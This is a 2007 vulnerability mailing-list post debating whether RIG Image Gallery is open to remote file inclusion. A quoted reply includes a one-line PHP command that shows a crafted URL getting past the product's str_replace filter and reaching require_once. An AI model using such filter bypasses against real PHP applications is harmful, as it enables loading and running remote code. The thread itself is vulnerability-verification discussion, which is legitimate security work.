[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

George A. Theall theall at tenablesecurity.com
Tue Jul 31 13:26:39 UTC 2007


On 07/31/07 11:09, ascii wrote:

> George A. Theall wrote:
>> But regardless, the str_replace() later on in rig_check_src_file()
>> would certainly void the possibility of a remote file include attack.
> 
> I'm not saying that the product is vulnerable but that this statement
> is completely flawed, 
...
> php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
> str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
> http://www.tin.it/

You're right, of course. But along with the register_globals check it 
does prevent the example exploit from working.

George
-- 
theall at tenablesecurity.com


More information about the VIM mailing list